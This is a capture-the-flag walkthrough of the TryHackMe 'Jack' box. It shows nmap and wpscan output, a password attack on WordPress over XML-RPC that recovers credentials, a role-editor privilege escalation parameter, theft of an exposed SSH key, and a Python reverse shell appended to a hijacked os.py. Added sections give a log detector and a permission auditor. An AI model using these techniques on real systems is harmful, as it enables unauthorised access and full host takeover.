TryHackMe-Jack

Room link: Jack

0x01 Information Gathering

NMAP

[email protected]:~# nmap -p- -sC -sV 10.10.145.220
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-04 02:58 UTC
Nmap scan report for ip-10-10-145-220.eu-west-1.compute.internal (10.10.145.220)
Host is up (0.0019s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 3e:79:78:08:93:31:d0:83:7f:e2:bc:b6:14:bf:5d:9b (RSA)
| 256 3a:67:9f:af:7e:66:fa:e3:f8:c7:54:49:63:38:a2:93 (ECDSA)
|_ 256 8c:ef:55:b0:23:73:2c:14:09:45:22:ac:84:cb:40:d2 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 5.3.2
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Jack's Personal Site – Blog for Jacks writing adven...
MAC Address: 02:5D:A7:C5:D7:FD (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.06 seconds

wpscan

[+] URL: http://jack.thm/ [10.10.145.220]
[+] Started: Sun Oct 4 03:13:23 2020

Interesting Finding(s):

[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] robots.txt found: http://jack.thm/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://jack.thm/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] WordPress readme found: http://jack.thm/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] Upload directory has listing enabled: http://jack.thm/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://jack.thm/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.3.2 identified (Insecure, released on 2019-12-18).
| Found By: Rss Generator (Passive Detection)
| - http://jack.thm/index.php/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>
| - http://jack.thm/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>

[+] WordPress theme in use: online-portfolio
| Location: http://jack.thm/wp-content/themes/online-portfolio/
| Last Updated: 2020-08-18T00:00:00.000Z
| Readme: http://jack.thm/wp-content/themes/online-portfolio/readme.txt
| [!] The version is out of date, the latest version is 0.0.9
| Style URL: http://jack.thm/wp-content/themes/online-portfolio/style.css?ver=5.3.2
| Style Name: Online Portfolio
| Style URI: https://www.amplethemes.com/downloads/online-protfolio/
| Description: Online Portfolio WordPress portfolio theme for building personal website. You can take full advantag...
| Author: Ample Themes
| Author URI: https://amplethemes.com/
|
| Found By: Css Style In Homepage (Passive Detection)
| Confirmed By: Css Style In 404 Page (Passive Detection)
|
| Version: 0.0.7 (80% confidence)
| Found By: Style (Passive Detection)
| - http://jack.thm/wp-content/themes/online-portfolio/style.css?ver=5.3.2, Match: 'Version: 0.0.7'

[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <======> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] jack
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://jack.thm/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[+] danny
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[+] wendy
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

Three users were identified, so the next step is a password attack against all of them:

wpscan --url http://jack.thm -U user -P /usr/share/wordpress/fasttrack.txt

[+] Performing password attack on Xmlrpc against 3 user/s
[SUCCESS] - wendy / changelater
Trying danny / starwars Time: 00:01:22 <====== > (646 / 868) 74.42% ETA: ??:??:

[!] Valid Combinations Found:
| Username: wendy, Password: changelater

I originally used the rockyou wordlist here, but after waiting more than two hours there was no progress, so I switched to a smaller one.
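From the defender's side, the password attack above runs entirely through xmlrpc.php and receives HTTP 200 on every attempt, so status codes reveal nothing and the per-client request rate is the signal. The detector below is an added example, not part of the original writeup; it runs over constructed Apache access-log lines (the IPs and timestamps are made up) and flags a client once its POSTs to /xmlrpc.php exceed a threshold inside a sliding window.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache combined log format; only the fields the detector uses are captured.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse(line):
    """Return (ip, time, method, path-without-query, status) or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return (m["ip"], datetime.strptime(m["ts"], TS_FMT), m["method"],
            m["path"].split("?", 1)[0], int(m["status"]))

def xmlrpc_bursts(lines, threshold=20, window=timedelta(seconds=60)):
    """Return {ip: peak} for clients whose POSTs to /xmlrpc.php exceed
    `threshold` within any `window`; every such POST returns 200, so only volume counts."""
    hits = defaultdict(list)
    for line in lines:
        rec = parse(line)
        if rec and rec[2] == "POST" and rec[3] == "/xmlrpc.php":
            hits[rec[0]].append(rec[1])
    flagged = {}
    for ip, times in hits.items():
        times.sort()
        start = peak = 0
        for end, t in enumerate(times):          # sliding window over sorted timestamps
            while t - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak > threshold:
            flagged[ip] = peak
    return flagged

def constructed_log():
    """Constructed sample (not from the box): 40 XML-RPC POSTs in 20 s plus a normal reader."""
    base = datetime(2020, 10, 4, 3, 20, 0, tzinfo=timezone.utc)
    fmt = '{ip} - - [{ts}] "{req} HTTP/1.1" {st} 512 "-" "Mozilla/5.0 (constructed)"'
    lines = []
    for i in range(40):
        ts = (base + timedelta(seconds=i // 2)).strftime(TS_FMT)
        lines.append(fmt.format(ip="10.0.0.5", ts=ts, req="POST /xmlrpc.php", st=200))
    for i in range(3):
        ts = (base + timedelta(seconds=30 * i)).strftime(TS_FMT)
        lines.append(fmt.format(ip="10.0.0.9", ts=ts, req="GET /index.php/feed/", st=200))
    return lines
```

Running `xmlrpc_bursts(constructed_log())` flags only 10.0.0.5; on a real server, feed the access log lines in instead and tune the threshold to the site's normal pingback and app traffic.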

0x02 Privilege Escalation

After logging in, the account is only an ordinary user and cannot do much.

But searching for the hinted ure_other_roles turns up a privilege escalation vulnerability in version 4.25 of the User Role Editor plugin, which makes it easy to become an admin user.

Exploiting it is simple: capture the request with Burp, go to the profile page, and update the profile.

Adding one parameter to the request is enough.

ure_other_roles=administrator

After logging in as admin, I usually edit the theme files, but the theme's PHP files could not be modified, so I switched to editing a plugin's files instead.

Then start a listener and visit http://jack.thm/wp-content/plugins/akismet/index.php

From the memo in jack's home directory we learn that jack's last backup file nearly got him hacked.

This is an important hint, so the next stop is /var/backups/

There is an id_rsa with 777 permissions. Copy this file into the web root.

Successfully escalated to jack.

This checker.py looks like it is run on a schedule, but we have no permission to modify the script directly, and we cannot create files in its directory either.

But we do have permission to modify os.py, which the script imports.

import os,socket,subprocess

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

s.connect(('ip',8888))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(['/bin/bash','-i'])

Since the code will live inside os.py itself, where dup2 is already in module scope, simply change it to

import socket,subprocess

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

s.connect(('ip',8888))
dup2(s.fileno(),0)
dup2(s.fileno(),1)
dup2(s.fileno(),2)
p=subprocess.call(['/bin/bash','-i'])

Append the modified content above directly to the end of os.py.

Opening python directly is enough to get a shell back, confirming the change; now we only have to wait for the scheduled run.
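Both footholds in this section, the world-readable id_rsa in /var/backups and the writable os.py imported by the scheduled checker.py, are permission mistakes that a routine host audit can catch before a cron job turns them into root. The script below is an added example, not part of the original writeup; the rules it enforces (no group/other bits on private keys, root ownership and no group/other write on modules a privileged job imports) are my assumptions about a sane baseline, and the /var/backups path and os.py module name are taken from the writeup.

```python
import os
import stat
import sys

# Both findings from the box reduce to mode bits: a private key with mode 777
# in a backup directory, and a stdlib module writable by a non-root user.
GROUP_OTHER_READ = stat.S_IRGRP | stat.S_IROTH
GROUP_OTHER_WRITE = stat.S_IWGRP | stat.S_IWOTH
PRIVATE_KEY_NAMES = {"id_rsa", "id_dsa", "id_ecdsa", "id_ed25519"}

def private_key_problems(mode):
    """A private key must carry no group/other bits at all."""
    problems = []
    if mode & GROUP_OTHER_READ:
        problems.append("readable by group/other")
    if mode & GROUP_OTHER_WRITE:
        problems.append("writable by group/other")
    return problems

def import_hijack_problems(mode, owner_uid, trusted_uid=0):
    """A module a privileged job imports may be writable only by its trusted owner."""
    problems = []
    if owner_uid != trusted_uid:
        problems.append(f"owned by uid {owner_uid}, not {trusted_uid}")
    if mode & GROUP_OTHER_WRITE:
        problems.append("writable by group/other")
    return problems

def audit_backup_keys(directory="/var/backups"):
    """Find private keys under `directory` whose mode bits expose them."""
    findings = {}
    for root, _, files in os.walk(directory):
        for name in files:
            path = os.path.join(root, name)
            if name in PRIVATE_KEY_NAMES and os.path.isfile(path):
                problems = private_key_problems(stat.S_IMODE(os.stat(path).st_mode))
                if problems:
                    findings[path] = problems
    return findings

def audit_import_path(module="os.py", search_path=None):
    """Check every copy of `module` reachable from sys.path (or `search_path`)."""
    findings = {}
    for directory in search_path if search_path is not None else sys.path:
        path = os.path.join(directory, module)
        if os.path.isfile(path):
            st = os.stat(path)
            problems = import_hijack_problems(stat.S_IMODE(st.st_mode), st.st_uid)
            if problems:
                findings[path] = problems
    return findings
```

Run `audit_backup_keys()` and `audit_import_path()` as root on the host to be checked; each returns a mapping of offending path to the list of problems, and an empty mapping means the checked baseline holds.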